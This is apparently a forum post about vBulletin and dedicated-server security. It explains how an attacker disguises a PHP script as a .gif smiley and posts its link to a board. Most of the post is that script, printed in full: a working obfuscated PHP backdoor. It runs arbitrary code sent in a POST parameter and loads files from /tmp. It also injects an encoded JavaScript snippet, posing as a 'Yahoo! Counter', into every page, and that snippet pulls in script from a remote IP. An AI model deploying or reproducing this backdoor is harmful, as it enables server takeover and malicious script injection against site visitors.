The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:
PHP Code:
<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
It is widely used as smilies, that look like broken images when viewed (php script executing).
Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all files needed to inject into each page on your site the above code. As I said before, change the host. Is not your fault or vBulletin developers if your host runs unsecured boxes.